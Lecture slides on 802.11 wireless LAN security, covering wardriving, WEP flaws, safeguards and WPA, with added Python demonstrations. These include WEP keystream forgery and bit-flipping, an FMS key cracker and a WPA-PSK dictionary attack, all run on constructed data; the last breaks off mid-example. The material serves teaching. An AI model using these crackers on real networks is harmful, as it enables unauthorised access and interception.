1 Network Security Lecture 8: Wireless LAN Security

2 WLAN Security - Contents
Wireless LAN Technology
Security History
Vulnerabilities
Demonstration

3 Wireless LANs
IEEE ratified 802.11 in 1997. Also known as Wi-Fi.
Original wireless LAN data rates: 1 Mbps and 2 Mbps.
WECA (Wireless Ethernet Compatibility Alliance), now the Wi-Fi Alliance, promoted interoperability between vendors.
802.11 covers Layers 1 and 2 of the OSI model: the physical layer and the data link layer.

4 802.11 Components
Two pieces of equipment defined:
Wireless station: a desktop or laptop PC or PDA with a wireless NIC.
Access point: a bridge between the wireless and wired networks, composed of a radio, a wired network interface (usually 802.3) and bridging software. Aggregates access for multiple wireless stations to the wired network.

5 802.11 modes
Infrastructure mode
Basic Service Set: one access point.
Extended Service Set: two or more BSSs forming a single subnet. Most corporate LANs run in this mode.
Ad-hoc mode
Also called peer-to-peer.
Independent Basic Service Set: a set of wireless stations that communicate directly without an access point. Useful for quick and easy wireless networks.

6 Infrastructure mode
(Diagram) Basic Service Set (BSS) – single cell: one access point serving its stations. Usual configuration for offices.
Extended Service Set (ESS) – multiple cells.

7 Independent Basic Service Set (IBSS)
Ad-hoc mode: for meetings, conferences or other places where wireless infrastructure (access points) doesn't exist.

8 802.11 Physical Layer
Originally three alternative physical layers:
Two incompatible spread-spectrum radios in the 2.4 GHz ISM (Industrial, Scientific and Medical) band:
Frequency Hopping Spread Spectrum (FHSS), 75 channels.
Direct Sequence Spread Spectrum (DSSS), 14 channels (11 channels in the US).
One diffuse infrared layer.
Speed 1 Mbps or 2 Mbps.

9 802.11 Data Link Layer
Layer 2 is split into Logical Link Control (LLC) and Media Access Control (MAC).
LLC uses the same 48-bit addressing as Ethernet.
CSMA/CD is not possible: a radio cannot listen for a collision while it is transmitting, so collisions must be avoided rather than detected.
CSMA/CA – Collision Avoidance: the sender waits for clear air, waits a random back-off time, then sends the data. The receiver sends an explicit ACK when the data arrives intact. This also handles interference, but adds overhead, so an 802.11 link is always slower than an equivalent wired Layer 2 link.

10 Hidden nodes
In the example above, each station can transmit to and receive from the access point, but the two stations cannot transmit to or receive from each other. Reasons may be interference or range. As a result, each station is hidden from the other. However, the access point can see both stations.

11 RTS / CTS
To handle hidden nodes (stations that cannot see each other but can see a common access point):
The sending station sends "Request to Send".
The access point responds with "Clear to Send".
All other stations hear this and delay any transmissions.
Only used for larger pieces of data, where a retransmission would waste significant time.

12 802.11b
802.11b ratified in 1999, adding 5.5 Mbps and 11 Mbps.
DSSS as physical layer. 11 channels (3 non-overlapping).
Dynamic rate shifting, transparent to higher layers: ideally 11 Mbps, shifting down through 5.5 Mbps and 2 Mbps to 1 Mbps at higher ranges or under interference, and back up when possible.
Maximum specified range 100 metres.
Average throughput of 4 Mbps.

13 Joining a BSS
When an 802.11 client enters the range of one or more APs:
APs send beacons; an AP beacon can include the SSID.
The AP is chosen on signal strength and observed error rates (wireless NICs can measure the strength of the wireless signal).
After the AP accepts the client, the client tunes to the AP's channel.
Periodically all channels are surveyed to check for stronger or more reliable APs; if one is found, the client reassociates with the new AP.

14 Access Point Roaming
(Diagram: a station roaming across four access points on channels 1, 4, 9 and 7.)

15 Roaming and Channels
Reassociation with APs is triggered by moving out of range, high error rates or high network traffic; this allows load balancing.
Each AP has a channel. 14 partially overlapping channels; only three channels have no overlap. Use those three for multicell coverage.

16 802.11a
802.11a ratified in 1999; products shipped from 2001.
Supports up to 54 Mbps in the 5 GHz range.
Higher frequency limits the range; regulated frequency reduces interference from other devices.
12 non-overlapping channels.
Usable range of 30 metres.
Average throughput of 30 Mbps.
Not backwards compatible with 802.11b.

17 802.11g
802.11g ratified in 2003.
Supports up to 54 Mbps in the 2.4 GHz range.
Backwards compatible with 802.11b.
3 non-overlapping channels.
Range similar to 802.11b.
Average throughput of 30 Mbps.
802.11n (at the time of this lecture due for November 2006; it was finally ratified in 2009), aiming for a maximum of 200 Mbps with an average of 100 Mbps.

18 Open System Authentication
Service Set Identifier (SSID): the station must specify the SSID to the access point when requesting association.
Multiple APs with the same SSID form an Extended Service Set.
APs can broadcast their SSID.
Some clients allow * (any) as the SSID and associate with the strongest AP regardless of SSID.
No credential is checked: open system authentication accepts any station that asks.

19 MAC ACLs and SSID hiding
Access points have Access Control Lists (ACLs): a list of allowed MAC addresses, e.g. allow access to 00:01:42:0E:12:1F, 00:01:42:F1:72:AE, 00:01:42:4F:E2:01.
But MAC addresses are sniffable and spoofable.
APs can beacon without the SSID, but the SSID is still sent in the clear when a client (re)associates: essid_jack sends deauthenticate frames to a client, and the SSID is displayed when the client sends its reassociation frames.

20 Interception range
(Diagram) Basic Service Set (BSS) – single cell, 100 metres: a station outside the building perimeter is still within range.

21 Interception
A wireless LAN uses a radio signal, not limited to the physical building.
The signal is weakened by walls, floors and interference.
A directional antenna allows interception over longer distances.

22 Directional Antenna
A directional antenna provides focused reception.
DIY plans are available: aluminium cake tin, Chinese cooking sieve.

23 WarDriving
Software: Netstumbler and many more.
Laptop with an 802.11b, g or a PC card.
Optional: Global Positioning System; car, bicycle, boat…
Logging of MAC address, network name (SSID), manufacturer, channel, signal strength, noise and, with GPS, location.
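What a war-driving logger actually does with a beacon is parse it, so here is a parser for the fields slides 18, 19 and 23 talk about: BSSID, SSID (including the "hidden" zero-length or NUL-filled SSID), channel, and the advertised security. This is an added example for this page, not code from the lecture or from Netstumbler; the frames it parses are constructed in the block rather than captured, and the field offsets (24-byte management header, 8-byte timestamp, 2-byte interval, 2-byte capability, then id/length/value elements) and element ids are the 802.11 ones.

```python
import struct

IE_SSID, IE_DS_PARAMS, IE_RSN, IE_VENDOR = 0, 3, 48, 221
WPA_OUI_TYPE = b"\x00\x50\xf2\x01"   # Microsoft OUI + type 1: the pre-802.11i WPA element
CAP_PRIVACY = 0x0010                 # capability bit: data confidentiality required


def parse_ies(body):
    """Yield (element id, data) from a run of id/length/value elements."""
    while len(body) >= 2:
        eid, length = body[0], body[1]
        data = body[2:2 + length]
        if len(data) < length:       # truncated trailing element: stop, never over-read
            break
        yield eid, data
        body = body[2 + length:]


def parse_beacon(frame):
    """Describe a beacon (subtype 8) or probe response (subtype 5) frame."""
    if len(frame) < 36:              # 24-byte MAC header + timestamp(8) + interval(2) + capability(2)
        raise ValueError("frame too short for a beacon")
    fc, = struct.unpack_from("<H", frame, 0)
    if fc & 0x0C != 0 or (fc >> 4) & 0x0F not in (5, 8):
        raise ValueError("not a management frame of subtype beacon/probe response")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])   # addr3 = BSSID
    capability, = struct.unpack_from("<H", frame, 34)
    info = {"bssid": bssid, "ssid": None, "hidden": False, "channel": None}
    has_rsn = has_wpa = False
    for eid, data in parse_ies(frame[36:]):
        if eid == IE_SSID:
            # "Hidden" SSID in beacons: zero length, or NUL bytes of the real length
            if data.strip(b"\x00") == b"":
                info["hidden"] = True
            else:
                info["ssid"] = data.decode("utf-8", "replace")
        elif eid == IE_DS_PARAMS and data:
            info["channel"] = data[0]
        elif eid == IE_RSN:
            has_rsn = True
        elif eid == IE_VENDOR and data.startswith(WPA_OUI_TYPE):
            has_wpa = True
    if has_rsn:
        info["security"] = "RSN (802.11i / WPA2)"
    elif has_wpa:
        info["security"] = "WPA"
    elif capability & CAP_PRIVACY:
        info["security"] = "WEP"            # privacy bit set but no WPA/RSN element
    else:
        info["security"] = "Open"
    return info


def build_beacon(bssid, ssid, channel, privacy=False, extra_ies=b"", subtype=8):
    """Construct a minimal beacon/probe response for the examples (not captured traffic)."""
    header = (struct.pack("<H", subtype << 4) + b"\x00\x00"   # frame control, duration
              + b"\xff" * 6 + bssid + bssid + b"\x00\x00")     # addr1 (broadcast), addr2, addr3, seq
    capability = 0x0001 | (CAP_PRIVACY if privacy else 0)      # ESS bit, optionally privacy
    fixed = struct.pack("<QHH", 0, 100, capability)            # timestamp, beacon interval, capability
    ies = bytes([IE_SSID, len(ssid)]) + ssid + bytes([IE_DS_PARAMS, 1, channel]) + extra_ies
    return header + fixed + ies


if __name__ == "__main__":
    ap = bytes.fromhex("0001420e121f")          # one of the MAC addresses from slide 19
    for frame in (
        build_beacon(ap, b"corp-net", 6),                            # open, SSID broadcast
        build_beacon(ap, b"", 11, privacy=True),                     # WEP, SSID hidden from beacons
        build_beacon(ap, b"corp-net", 11, privacy=True, subtype=5),  # probe response reveals it
        build_beacon(ap, b"guest", 1, privacy=True, extra_ies=bytes([IE_RSN, 2, 1, 0])),
    ):
        print(parse_beacon(frame))
```

The second and third constructed frames are the SSID-hiding case from slide 19: the beacon carries an empty SSID, but the probe response (and the client's association request) carries it in the clear, so a passive sniffer gets it anyway.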

24 WarDriving results
Peter Shipley, San Francisco, 2001: commercial directional antenna, driving at a maximum of 55 miles per hour.
1500 access points found. 60% in default configuration. Most connected to internal backbones. 85% use Open System Authentication.
From hilltops, the commercial directional antenna gave a 25 mile range.

25 WarDriving map
Source: www.dis.org/wl/maps/

26 Worldwide War Drive 2004 (fourth WWWD)
228,537 access points.
82,755 (35%) with default SSID.
140,890 (60%) with Open System Authentication.
62,859 (27%) with both, probably default configuration.

27 Further issues
Access point configuration: mixtures of SNMP, web, serial and telnet interfaces, with default community strings and default passwords.
Evil Twin access points: a stronger signal captures user authentication.
Renegade access points: unauthorised wireless LANs.

28 War Driving prosecutions
February 2004, Texas: Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials.
June 2004, North Carolina, Lowes DIY store: Botbyl convicted for stealing credit card numbers via an unprotected WLAN; Timmins convicted for checking e-mail and web browsing via an unprotected WLAN.
June 2004, Connecticut: Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs ("make the check payable to M.Tereshchuk").
September 2004, Los Angeles: Nicholas Tombros guilty of drive-by spamming via unprotected WLANs.

29 802.11b Security Services
Two security services provided:
Authentication: Shared Key Authentication.
Encryption: Wired Equivalent Privacy (WEP).

30 Wired Equivalent Privacy
A shared key between the stations and an access point; in an Extended Service Set all access points have the same shared key.
No key management: the shared key is entered manually into stations and access points.
A key management nightmare in large wireless LANs.

31 RC4
Ron's Code number 4 (Rivest Cipher 4), RSA Security Inc. Symmetric key encryption, designed in 1987.
A trade secret until the source code leaked to the cypherpunks mailing list in 1994.
RC4 can use key sizes from 8 bits (one byte) to 2048 bits.
RC4 generates a stream of pseudo random bits, which is XORed with the plaintext to create the ciphertext.

32 WEP – Sending
Compute the Integrity Check Value (ICV): a 32-bit Cyclic Redundancy Check, appended to the message to create the plaintext. Intended to provide integrity.
Encrypt the plaintext with RC4 to provide confidentiality: the plaintext is XORed with a long key stream of pseudo random bits. The key stream is a function of the 40-bit secret key and a 24-bit initialisation vector (IV).
The ciphertext is transmitted, with the IV in the clear.

33 WEP Encryption
(Diagram) Initialisation Vector (IV) || secret key → RC4 PRNG → key stream. Plaintext || 32-bit CRC, XORed with the key stream → ciphertext. The IV is sent along with the ciphertext.

34 WEP – Receiving
The ciphertext is received.
Decrypt with RC4: the ciphertext is XORed with the key stream, a function of the 40-bit secret key and the 24-bit IV carried in the frame.
Check the ICV: separate the ICV from the message, compute the ICV for the message and compare with the received ICV.

35 Shared Key Authentication
When a station requests association with an access point:
The AP sends a random number (the challenge) to the station.
The station encrypts the random number with RC4, the 40-bit shared secret key and a 24-bit IV.
The encrypted random number is sent to the AP.
The AP decrypts the received message and compares the decrypted random number to the one it transmitted.
If the numbers match, the station has the shared secret key.
Note that an eavesdropper sees both the challenge and its encryption, and so learns a key stream for that IV.

36 WEP Safeguards
Shared secret key required for associating with an access point, sending data and receiving data.
Messages are encrypted: confidentiality.
Messages have a checksum: integrity.
But management traffic is still broadcast in the clear, including the SSID.

37 Initialisation Vector
The IV must be different for every message transmitted, but the standard doesn't specify how the IV is calculated.
Wireless cards use several methods: some use a simple ascending counter for each message, some switch between alternate ascending and descending counters, some use a pseudo random IV generator.
If the IV is the same, the key stream is the same: two identical messages give the same ciphertext, and any two messages under the same IV XOR to the XOR of their plaintexts.

38 Passive WEP attack
If the 24-bit IV is an ascending counter and the access point transmits at 11 Mbps, all IVs are exhausted in roughly 5 hours.
Passive attack: the attacker collects all traffic and could collect two messages encrypted with the same key and the same IV.
Statistical attacks then reveal the plaintext, and Plaintext XOR Ciphertext = Keystream.

39 Active WEP attack
If the attacker knows a plaintext and ciphertext pair, the key stream for that IV is known.
The attacker can then create correctly encrypted messages, and the access point is deceived into accepting them.
Bit flipping: flip a bit in the ciphertext; because CRC-32 is linear, the resulting bit difference in the CRC-32 can be computed and applied to the encrypted ICV too, so the receiver's check still passes.
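Slides 37 to 39 can be carried through in code. The block below is an added example, not from the lecture: it encapsulates frames the way WEP does (message || CRC-32 ICV, XORed with a key stream selected by the IV), then recovers the key stream from one known plaintext under a reused IV, forges a new frame with it, and separately flips bits in a frame whose key stream is unknown while correcting the ICV. The key stream generator is a stand-in (SHA-256 over IV and key, repeated with a counter) rather than RC4, because neither attack depends on how the key stream is produced, only on "same IV and key, same key stream" and on the CRC being linear; the secret key, IV and messages are constructed.

```python
import hashlib
import struct
import zlib

SECRET = b"\x1f\x2a\x3b\x4c\x5d"   # constructed 40-bit key shared by AP and stations


def keystream(iv, key, length):
    """Stand-in for RC4(iv || key): deterministic in (iv, key), prefix-consistent."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(iv + key + struct.pack(">I", counter)).digest()
        counter += 1
    return out[:length]


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, key, message):
    """Sender: ICV = CRC-32(message); plaintext = message || ICV; XOR with key stream; IV in clear."""
    plaintext = message + struct.pack("<I", zlib.crc32(message))
    return iv + xor_bytes(plaintext, keystream(iv, key, len(plaintext)))


def wep_decrypt(key, frame):
    """Receiver: XOR with the key stream for the frame's IV, then check the ICV. None if it fails."""
    iv, ciphertext = frame[:3], frame[3:]
    plaintext = xor_bytes(ciphertext, keystream(iv, key, len(ciphertext)))
    message, icv = plaintext[:-4], struct.unpack("<I", plaintext[-4:])[0]
    return message if zlib.crc32(message) == icv else None


# Passive attack (slide 38): one known plaintext under an IV gives the whole key stream for that IV.
def recover_keystream(frame, known_message):
    known_plaintext = known_message + struct.pack("<I", zlib.crc32(known_message))
    return frame[:3], xor_bytes(frame[3:], known_plaintext)


def forge_frame(iv, ks, message):
    """Encrypt an arbitrary message under a recovered key stream; the AP will accept it."""
    plaintext = message + struct.pack("<I", zlib.crc32(message))
    if len(plaintext) > len(ks):
        raise ValueError("not enough recovered key stream for this message")
    return iv + xor_bytes(plaintext, ks[:len(plaintext)])


# Active attack (slide 39): flip bits without knowing the key stream at all.
def crc_delta(delta):
    """ICV change caused by XORing `delta` into the message.
    CRC-32 with its init/final XOR is affine: crc(m ^ d) = crc(m) ^ crc(d) ^ crc(zeros of len(d))."""
    return zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))


def bitflip_frame(frame, delta):
    """XOR `delta` (one byte per message byte) into the ciphertext and patch the encrypted ICV."""
    iv, ciphertext = frame[:3], frame[3:]
    if len(delta) != len(ciphertext) - 4:
        raise ValueError("delta must cover exactly the message bytes")
    return iv + xor_bytes(ciphertext, delta + struct.pack("<I", crc_delta(delta)))


if __name__ == "__main__":
    iv = b"\x00\x00\x07"                       # the card's counter wrapped: IV reused
    f1 = wep_encrypt(iv, SECRET, b"GET /index.html ")
    f2 = wep_encrypt(iv, SECRET, b"pass=hunter2;;;;")
    print("C1 ^ C2 == P1 ^ P2:", xor_bytes(f1[3:19], f2[3:19]) ==
          xor_bytes(b"GET /index.html ", b"pass=hunter2;;;;"))
    _, ks = recover_keystream(f1, b"GET /index.html ")
    print("forged frame accepted as:", wep_decrypt(SECRET, forge_frame(iv, ks, b"hijack")))
    delta = b"\x00" * 5 + xor_bytes(b"hunter2", b"letmein") + b"\x00" * 4
    print("bit-flipped frame accepted as:", wep_decrypt(SECRET, bitflip_frame(f2, delta)))
```

The receiver never notices either attack: the forged frame has a valid ICV by construction, and the bit-flipped one passes because the CRC difference of a known delta does not depend on the unknown message. A keyed MIC (what WPA's Michael adds) is what closes the second hole; a fresh key stream per frame closes the first.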

40 Limited WEP keys
Some vendors allow limited WEP keys: the user types in a passphrase and the WEP key is generated from it.
The passphrase creates only 21 bits of entropy in the 40-bit key; the remaining 19 bits are predictable.
Reduces the key strength to 21 bits = 2,097,152 keys. A 21-bit key can be brute forced in minutes.
See Tim Newsham's site.

41 Creating limited WEP keys
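To show where the 21 bits in slides 40 and 41 come from, here is a passphrase-to-key generator of the criticised kind and the search it enables. This is an added example, not the lecture's code: the generator is my reconstruction of the widely cloned Neesus Datacom algorithm that Tim Newsham analysed (XOR the ASCII bytes into a 32-bit seed, then draw key bytes from a linear congruential generator); the multiplier and increment are an assumption to be checked against a real implementation before relying on the exact key values, but the entropy argument holds for any generator of this shape.

```python
LCG_MUL, LCG_INC = 0x343FD, 0x269EC3    # assumed constants (those of the classic MSVC rand())


def seed_from_passphrase(passphrase):
    """XOR each ASCII byte of the passphrase into byte (i mod 4) of a 32-bit seed."""
    seed = 0
    for i, ch in enumerate(passphrase.encode("ascii")):
        seed ^= ch << (8 * (i % 4))
    return seed


def keys_from_seed(seed):
    """Four 40-bit keys; each key byte is bits 16..23 of the next LCG state."""
    state = seed & 0xFFFFFFFF
    keys = []
    for _ in range(4):
        key = bytearray()
        for _ in range(5):
            state = (state * LCG_MUL + LCG_INC) & 0xFFFFFFFF
            key.append((state >> 16) & 0xFF)
        keys.append(bytes(key))
    return keys


def wep_keys_from_passphrase(passphrase):
    return keys_from_seed(seed_from_passphrase(passphrase))


def effective_keyspace():
    """Bits 16..23 of state*MUL+INC depend only on bits 0..23 of state, so seed byte 3 never
    reaches any key byte; ASCII input keeps bit 7 of the other three bytes clear.
    3 bytes * 7 bits = 21 bits, however long the passphrase is."""
    return 1 << 21


def recover_seed(key0):
    """Search the 2^21 reachable seeds for one that reproduces key number 0 (the
    'brute force in minutes' of slide 40; in Python the full space takes seconds)."""
    for b2 in range(128):
        for b1 in range(128):
            for b0 in range(128):
                seed = b0 | (b1 << 8) | (b2 << 16)
                state = seed
                for expected in key0:
                    state = (state * LCG_MUL + LCG_INC) & 0xFFFFFFFF
                    if (state >> 16) & 0xFF != expected:
                        break
                else:
                    return seed           # every key byte matched
    return None


if __name__ == "__main__":
    keys = wep_keys_from_passphrase("Secret")
    print("keys:", [k.hex() for k in keys])
    print("4th character ignored:", wep_keys_from_passphrase("abc") == wep_keys_from_passphrase("abcQ"))
    print("seed recovered: 0x%06x" % recover_seed(keys[0]))
```

Two things worth noticing in the output: any passphrase character at position 3, 7, 11, ... changes nothing, and the recovered seed is all an attacker needs, because every key the device will ever generate follows from it.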

42 Brute force key attack
Capture the ciphertext; the IV is included in the message.
Search all 2^40 possible secret keys: 1,099,511,627,776 keys, ~170 days on a modern laptop (at the time of this lecture).
Find which key decrypts the ciphertext to plaintext.

43 128 bit WEP
Vendors have extended WEP to 128-bit keys: a 104-bit secret key and a 24-bit IV.
Brute force takes about 10^19 years for a 104-bit key, so it effectively safeguards against brute force attacks.

44 Key Scheduling Weakness
Paper from Fluhrer, Mantin and Shamir, 2001. Two weaknesses:
Invariance weakness: certain keys leak into the key stream. Specific patterns which, when they appear in RC4 keys, are likely to appear in the generated key stream, so their occurrences in the secret key can be isolated by simple analysis of the stream (sometimes the ciphertext itself is enough).
IV weakness: if a portion of the PRNG input is exposed, analysis of the initial key stream allows the key to be determined. This is a practical ciphertext-only attack on the WEP mode of operation of RC4, when the key and the IV are combined in a simple way such as concatenation.

45 IV weakness
WEP exposes part of the PRNG input: the IV is transmitted with the message.
Every wireless frame has a reliable first byte: the Sub-Network Access Protocol (SNAP) header used in the logical link control layer (the upper sub-layer of the data link layer) starts with 0xAA.
The attack:
Capture packets with weak IVs.
First byte of ciphertext XOR 0xAA = first byte of key stream.
The key can be determined from the initial key stream.
Practical for 40-bit and 104-bit keys. Passive attack: non-intrusive, no warning.
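The attack of slides 44 and 45 end to end, as an added example (not code from the lecture, WEPCrack or Airsnort): RC4 keyed the way WEP keys it (IV || secret), a simulated sniffer log whose first plaintext byte is the SNAP 0xAA, and the key recovery one byte at a time. The captured frames are constructed here; the simulated access point happens to emit the classic weak IVs (B+3, 255, X), which is exactly what the original tools waited for. The "resolved" test on the partial key schedule and the guess formula are the FMS ones; trying the best few candidates per byte and verifying a full key against a handful of frames is my addition, the same idea as the fudge factor in later tools.

```python
SNAP_FIRST_BYTE = 0xAA


def rc4_ksa(key, steps=256):
    """Key-scheduling algorithm; steps < 256 gives the partial state the attacker can simulate."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_first_byte(key):
    """First key stream byte: one PRGA step after a full KSA."""
    S, _ = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) & 0xFF]


def capture_weak_frames(secret):
    """Simulated sniffer log: (IV, first ciphertext byte) for the IVs (B+3, 255, X)."""
    frames = []
    for b in range(len(secret)):
        for x in range(256):
            iv = bytes([b + 3, 255, x])
            frames.append((iv, rc4_first_byte(iv + secret) ^ SNAP_FIRST_BYTE))
    return frames


def fms_votes(frames, known):
    """Vote for secret byte number len(known), using only frames whose IV is 'resolved'."""
    a = 3 + len(known)                       # key index under attack (3 IV bytes come first)
    votes = [0] * 256
    for iv, ct0 in frames:
        S, j = rc4_ksa(iv + known, steps=a)  # attacker knows the IV and the recovered prefix
        if S[1] < a and (S[1] + S[S[1]]) & 0xFF == a:       # FMS resolved condition
            out = ct0 ^ SNAP_FIRST_BYTE      # first key stream byte, from the known plaintext
            votes[(S.index(out) - j - S[a]) & 0xFF] += 1    # right with probability ~5%
    return votes


def crack_wep_key(frames, keylen, fudge=6, verify_with=8):
    """Depth-first over the `fudge` best candidates per byte; accept a full key only if it
    reproduces the first key stream byte of `verify_with` captured frames."""
    def verify(key):
        return all(rc4_first_byte(iv + key) ^ ct0 == SNAP_FIRST_BYTE
                   for iv, ct0 in frames[:verify_with])

    def search(prefix):
        if len(prefix) == keylen:
            return prefix if verify(prefix) else None
        votes = fms_votes(frames, prefix)
        for cand in sorted(range(256), key=lambda k: -votes[k])[:fudge]:
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


if __name__ == "__main__":
    secret = bytes.fromhex("1f2a3b4c5d")     # constructed 40-bit key
    frames = capture_weak_frames(secret)
    print("captured", len(frames), "frames; recovered key:", crack_wep_key(frames, 5).hex())
```

Nothing here depends on the key length: `capture_weak_frames` and `crack_wep_key` work unchanged for a 13-byte (104-bit) key, which is why the slide can say the attack is practical for both. Each weak IV leaks the right byte only about 5% of the time, so the vote counts are what carry the signal, and the final verification is what makes a wrong vote recoverable instead of fatal.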

46 Wepcrack
First tool to demonstrate the attack using the IV weakness. Open source, Anton Rager.
Three components:
WeakIVGen.pl – a simple emulation of the IV/encrypted output one might observe from a WEP-enabled access point; generates the IV combinations that weaken the secret key used to encrypt the WEP traffic.
prism-getIV.pl – relies on output from Prismdump (or from Ethereal captures if libpcap has been patched for monitor mode), looks for IVs that match the pattern known to weaken secret keys, and records them together with the first byte of the encrypted output in a log file.
WEPCrack.pl – uses the data collected or generated above to attempt to determine the secret key. Works with either 40-bit or 128-bit WEP.
Cumbersome; the attack relies on TCP/IP packets having well known first bytes.

47 Airsnort
Automated tool, Cypher42, Minnesota, USA. Does it all: sniffs, searches for weak IVs and records encrypted data until the key is derived.
Needs 100 MB to 1 GB of transmitted data: 3 to 4 hours on a very busy WLAN.

48 Avoid the weak IVs
FMS described a simple method to find weak IVs, and many manufacturers avoid those IVs after 2002; therefore Airsnort and others may not work on recent hardware.
However, David Hulton (aka h1kari) properly implemented the FMS attack, which shows many more weak IVs, and identified IVs that leak into the second byte of the key stream. The second byte of the SNAP header is also 0xAA.
So the attack still works on recent hardware, and is faster on older hardware: dwepcrack, weplab, aircrack.

49 Generating WEP traffic
Not capturing enough traffic? Capture encrypted ARP request packets (anecdotally, frame lengths of 68, 118 and 368 bytes appear appropriate) and replay them to generate encrypted ARP replies, each under a fresh IV. Aireplay implements this.

50 802.11 safeguards
Security policy and architecture design.
Treat as an untrusted LAN.
Discover unauthorised use.
Access point audits.
Station protection.
Access point location and antenna design.

51 Security Policy & Architecture
Define the use of the wireless network: what is allowed, what is not allowed.
Holistic architecture and implementation: consider all threats and design the entire architecture to minimise risk.

52 Wireless as untrusted LAN
Treat wireless as untrusted, similar to the Internet.
Firewall between the WLAN and the backbone. Extra authentication required.
Intrusion detection at the WLAN / backbone junction. Vulnerability assessments.

53 Discover unauthorised use
Search for unauthorised access points, ad-hoc networks or clients.
Port scanning for unknown SNMP agents and unknown web or telnet interfaces.
Warwalking! Sniff packets, identify IP addresses, detect signal strength. But you may sniff your neighbours…
Wireless intrusion detection: AirMagnet, AirDefense, Trapeze, Aruba, …

54 Access point audits
Review the security of access points: are passwords and community strings secure?
Use firewalls and router ACLs to limit use of access point administration interfaces.
Standard access point configuration: SSID, WEP keys, community string and password policy.

55 Station protection
Personal firewalls: protect the station from attackers.
VPN from the station into the intranet: end-to-end encryption into the trusted network, but consider roaming issues.
Host intrusion detection: early warning of intrusions onto a station.
Configuration scanning: check that stations are securely configured.

56 Location of Access Points
Ideally locate access points in the centre of buildings.
Try to avoid access points by windows, on external walls or with line of sight to outside.
Use a directional antenna to "point" the radio signal.

57 WPA
Wi-Fi Protected Access "fixes" WEP's problems. Works with 802.11b, a and g; existing hardware can be used.
802.1X user-level authentication.
TKIP: RC4 with session-based dynamic encryption keys, per-packet key derivation (so the weak-IV attack on a static key no longer applies), unicast and broadcast key management, and a new 48-bit IV with a new sequencing method.
Michael: an 8-byte keyed message integrity code (MIC), so bit flipping is detected.
Optional AES support to replace RC4.

58 WPA and 802.1X
802.1X is a general purpose network access control mechanism.
WPA has two modes:
Pre-shared mode, uses pre-shared keys (a passphrase from which the pairwise master key is derived).
Enterprise mode, uses the Extensible Authentication Protocol (EAP) with a RADIUS server making the authentication decision.
EAP is a transport for authentication, not authentication itself; EAP allows arbitrary authentication methods. For example, Windows supports EAP-TLS (requiring client and server certificates) and PEAP-MS-CHAPv2.

59 Practical WPA attacks
Dictionary attack on pre-shared key mode: CoWPAtty, Joshua Wright. A captured four-way handshake is enough to test candidate passphrases offline.
Denial of service: if WPA equipment sees two packets with invalid Michael MICs within 60 seconds, all clients are disassociated and all activity stops for one minute. Two malicious packets a minute are enough to stop a wireless network.
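The dictionary attack above, carried through in code as an added example (not from CoWPAtty or the lecture), with the handshake it needs constructed locally so that it runs offline. The derivations are the 802.11i ones as I know them: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the two MAC addresses and of the two nonces); KCK = first 16 bytes of the PTK; the EAPOL-Key MIC is HMAC-SHA1 truncated to 16 bytes for key descriptor version 2 (CCMP) or HMAC-MD5 for version 1 (TKIP), computed over the EAPOL-Key frame with its MIC field zeroed. The SSID, MAC addresses, nonces and the EAPOL-Key body are constructed; the block checks its PBKDF2 against the published 802.11i test vector.

```python
import hashlib
import hmac

# Constructed handshake parameters (not captured traffic)
SSID = b"corp-net"
AP_MAC = bytes.fromhex("000142f172ae")
STA_MAC = bytes.fromhex("001a2b3c4d5e")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
EAPOL_BODY = (b"\x01\x03\x00\x5f"                 # EAPOL version 1, type 3 (Key), body length 95
              + b"\x02\x01\x0a\x00\x10"           # descriptor type 2, key info 0x010a, key length 16
              + bytes(8)                          # replay counter
              + SNONCE + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, RSC, key ID
              + bytes(16)                         # MIC field, zeroed for the MIC computation
              + b"\x00\x00")                      # key data length


def pmk_from_passphrase(passphrase, ssid):
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK from the PMK, both MAC addresses and both nonces, in min/max order."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, frame, version=2):
    """EAPOL-Key MIC: HMAC-MD5 for descriptor version 1 (TKIP), HMAC-SHA1 for 2 (CCMP); 16 bytes."""
    digestmod = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, frame, digestmod).digest()[:16]


def message2_mic(passphrase):
    """Supplicant side: the MIC a sniffer sees on message 2 of the four-way handshake."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_BODY)        # KCK = first 16 bytes of the PTK


def dictionary_attack(wordlist, mic, frame=EAPOL_BODY):
    """Offline: recompute PMK -> PTK -> KCK -> MIC for each candidate until one matches."""
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return candidate
    return None


if __name__ == "__main__":
    observed = message2_mic("summer2005")        # what the sniffer captured
    words = ["password", "corp-net", "letmein", "summer2005", "Summer2005"]
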